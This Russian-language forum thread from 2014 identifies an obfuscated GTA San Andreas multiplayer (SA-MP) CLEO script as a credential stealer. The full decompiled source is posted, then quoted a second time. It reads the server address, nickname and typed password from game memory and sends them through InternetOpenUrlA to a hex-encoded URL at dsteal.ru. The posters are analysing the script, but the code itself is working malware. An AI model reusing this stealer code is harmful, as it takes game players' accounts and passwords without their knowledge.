Скрипт

Sergey_Gray · 20 Дек 2014

Здравствуйте
нашёл скрипт, очень странная криптовка, можете кто декриптнуть ? (Скорее всего стиллер)

StefanWW · 20 Дек 2014

Это пидараса стиллер, доси с читмастера, он ворует с логи с бд., карабашка тоже.
http://dsteal.ru?/add.php?

PHP:

0AD3: 20@ = format "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@ 
0AC8: 8@ = allocate_memory_size 356
0AD3: 8@ = format ""

Говорит без сф работает, пин говорил читает. Только не вижу в пина.
20к строк пустых еблан блять

StefanWW · 20 Дек 2014

Вот весь код.

CLEO:

// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0001: wait 0 ms
0AB1: call_scm_func @Label1646 0 
0AB1: call_scm_func @Label1506 1 -38 
0002: jump @Label1838

:Label38
0001: wait 0 ms
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 
0A8E: 33@ = 0@ + 47806 // int
0A8D: 32@ = read_memory 33@ size 1 virtual_protect 1
00D6: if
0039:   32@ == 0
004D: jump_if_false @Label166
0A8E: 3@ = 0@ + 2173568 // int

:Label166
00D6: if
0039:   32@ == 64
004D: jump_if_false @Label197
0A8E: 3@ = 0@ + 2173624 // int

:Label197
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
00D6: if
0019:   2@ > 1000
004D: jump_if_false @Label1108
0A8E: 22@ = 2@ + 985 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
00D6: if
0019:   2@ > 1000
004D: jump_if_false @Label1108
0A8E: 5@ = 23@ + 20 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
00D6: if
0019:   4@ > 1000
004D: jump_if_false @Label1108
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
00D6: if
0019:   24@ > 1000
004D: jump_if_false @Label1108
00D6: if
0039:   32@ == 0
004D: jump_if_false @Label383
0A8E: 22@ = 0@ + 2173504 // int

:Label383
00D6: if
0039:   32@ == 64
004D: jump_if_false @Label414
0A8E: 22@ = 0@ + 2173560 // int

:Label414
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
00D6: if
0019:   1@ > 1000
004D: jump_if_false @Label1108
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
00D6: if
0039:   6@ == 1
004D: jump_if_false @Label539
00D6: if or
0039:   26@ == 1
0039:   26@ == 3
004D: jump_if_false @Label539
0006: 25@ = 1

:Label539
00D6: if and
0039:   25@ == 1
8039:   not  6@ == 1
004D: jump_if_false @Label1108
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
00D6: if
0039:   32@ == 0
004D: jump_if_false @Label639
0A8E: 6@ = 0@ + 617008 // int

:Label639
00D6: if
0039:   32@ == 64
004D: jump_if_false @Label670
0A8E: 6@ = 0@ + 515232 // int

:Label670
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@ 
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
00D6: if
8029:   not  23@ >= 16
004D: jump_if_false @Label751
0085: 12@ = 7@ // (int)
0002: jump @Label763

:Label751
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1

:Label763
0001: wait 100 ms
0A8E: 9@ = 2@ + 710 // int
0A8E: 14@ = 2@ + 452 // int
0A8E: 8@ = 2@ + 969 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
010B: 21@ = player $0[2] money
0AC6: 0@ = label @Label1802 offset
0AB1: call_scm_func @Label1115 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@ 
0AC8: 20@ = allocate_memory_size 1024
0050: gosub @Label1828
0AC8: 20@ = allocate_memory_size 456
0AD3: 20@ = format "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@ 
0AC8: 8@ = allocate_memory_size 356
0AD3: 8@ = format "" 
0AB1: call_scm_func @Label1357 1 8@ 9@ 
0AB1: call_scm_func @Label1430 2 9@ 20@ 
0AC9: free_allocated_memory 8@
0AC9: free_allocated_memory 20@
0006: 25@ = 0

:Label1108
0002: jump @Label38

:Label1115
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetLocalTime" library 0@ // IF and SET
0AC8: 2@ = allocate_memory_size 32
0AA5: call 1@ num_params 1 pop 0 2@ 
0A8D: 3@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 4@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 5@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 6@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 7@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 8@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 9@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 10@ = read_memory 2@ size 2 virtual_protect 0
000E: 2@ -= 30
0AB2: ret 8 22@ 4@ 25@ 6@ 7@ 8@ 9@ 10@

:Label1357
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@ 
0AB2: ret 1 1@

:Label1430
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@ 
0AB2: ret 0

:Label1506
0A9F: 32@ = current_thread_pointer
000A: 32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@ 
005A: 32@ += 0@ // (int)
000A: 33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 44
0006: 32@ = 0

:Label1597
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
000A: 32@ += 1
0019:   32@ > 30
004D: jump_if_false @Label1597
0AB2: ret 0

:Label1646
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 
000A: 0@ += 371500
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
000A: 0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
000A: 0@ += 9
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
000A: 0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0AB2: ret 0

:Label1802
hex
 68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
 2F 61 64 64 2E 70 68 70 3F 00
end

:Label1828
0006: 28@ = 414
0051: return

Sergey_Gray · 20 Дек 2014

StefanWW написал(а):

Вот весь код.

PHP:

// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0001: wait 0 ms
0AB1: call_scm_func @Label1646 0 
0AB1: call_scm_func @Label1506 1 -38 
0002: jump @Label1838

:Label38
0001: wait 0 ms
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 
0A8E: 33@ = 0@ + 47806 // int
0A8D: 32@ = read_memory 33@ size 1 virtual_protect 1
00D6: if
0039:   32@ == 0
004D: jump_if_false @Label166
0A8E: 3@ = 0@ + 2173568 // int

:Label166
00D6: if
0039:   32@ == 64
004D: jump_if_false @Label197
0A8E: 3@ = 0@ + 2173624 // int

:Label197
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
00D6: if
0019:   2@ > 1000
004D: jump_if_false @Label1108
0A8E: 22@ = 2@ + 985 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
00D6: if
0019:   2@ > 1000
004D: jump_if_false @Label1108
0A8E: 5@ = 23@ + 20 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
00D6: if
0019:   4@ > 1000
004D: jump_if_false @Label1108
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
00D6: if
0019:   24@ > 1000
004D: jump_if_false @Label1108
00D6: if
0039:   32@ == 0
004D: jump_if_false @Label383
0A8E: 22@ = 0@ + 2173504 // int

:Label383
00D6: if
0039:   32@ == 64
004D: jump_if_false @Label414
0A8E: 22@ = 0@ + 2173560 // int

:Label414
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
00D6: if
0019:   1@ > 1000
004D: jump_if_false @Label1108
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
00D6: if
0039:   6@ == 1
004D: jump_if_false @Label539
00D6: if or
0039:   26@ == 1
0039:   26@ == 3
004D: jump_if_false @Label539
0006: 25@ = 1

:Label539
00D6: if and
0039:   25@ == 1
8039:   not  6@ == 1
004D: jump_if_false @Label1108
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
00D6: if
0039:   32@ == 0
004D: jump_if_false @Label639
0A8E: 6@ = 0@ + 617008 // int

:Label639
00D6: if
0039:   32@ == 64
004D: jump_if_false @Label670
0A8E: 6@ = 0@ + 515232 // int

:Label670
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@ 
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
00D6: if
8029:   not  23@ >= 16
004D: jump_if_false @Label751
0085: 12@ = 7@ // (int)
0002: jump @Label763

:Label751
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1

:Label763
0001: wait 100 ms
0A8E: 9@ = 2@ + 710 // int
0A8E: 14@ = 2@ + 452 // int
0A8E: 8@ = 2@ + 969 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
010B: 21@ = player $0[2] money
0AC6: 0@ = label @Label1802 offset
0AB1: call_scm_func @Label1115 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@ 
0AC8: 20@ = allocate_memory_size 1024
0050: gosub @Label1828
0AC8: 20@ = allocate_memory_size 456
0AD3: 20@ = format "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@ 
0AC8: 8@ = allocate_memory_size 356
0AD3: 8@ = format "" 
0AB1: call_scm_func @Label1357 1 8@ 9@ 
0AB1: call_scm_func @Label1430 2 9@ 20@ 
0AC9: free_allocated_memory 8@
0AC9: free_allocated_memory 20@
0006: 25@ = 0

:Label1108
0002: jump @Label38

:Label1115
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetLocalTime" library 0@ // IF and SET
0AC8: 2@ = allocate_memory_size 32
0AA5: call 1@ num_params 1 pop 0 2@ 
0A8D: 3@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 4@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 5@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 6@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 7@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 8@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 9@ = read_memory 2@ size 2 virtual_protect 0
000A: 2@ += 2
0A8D: 10@ = read_memory 2@ size 2 virtual_protect 0
000E: 2@ -= 30
0AB2: ret 8 22@ 4@ 25@ 6@ 7@ 8@ 9@ 10@

:Label1357
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@ 
0AB2: ret 1 1@

:Label1430
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@ 
0AB2: ret 0

:Label1506
0A9F: 32@ = current_thread_pointer
000A: 32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@ 
005A: 32@ += 0@ // (int)
000A: 33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 44
0006: 32@ = 0

:Label1597
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
000A: 32@ += 1
0019:   32@ > 30
004D: jump_if_false @Label1597
0AB2: ret 0

:Label1646
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 
000A: 0@ += 371500
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
000A: 0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
000A: 0@ += 9
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
000A: 0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0AB2: ret 0

:Label1802
hex
68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
2F 61 64 64 2E 70 68 70 3F 00
end

:Label1828
0006: 28@ = 414
0051: return

я этот код примерно знаю, спасибо, чем ты декриптовывал ? не мог бы ты пожалуйста скинуть ? или в ЛС, если не составит труда.

StefanWW · 20 Дек 2014

Sergey_Gray написал(а):
я этот код примерно знаю, спасибо, чем ты декриптовывал ? не мог бы ты пожалуйста скинуть ? или в ЛС, если не составит труда.

Не мог бы :boss:

Sergey_Gray · 20 Дек 2014

StefanWW написал(а):
Не мог бы :boss:

Ладно, спасибо и на коде

Поиск

Поиск

Скрипт

Sergey_Gray

Новичок

StefanWW

Новичок

StefanWW

Новичок

Sergey_Gray

Новичок

StefanWW

Новичок

Sergey_Gray

Новичок

Похожие темы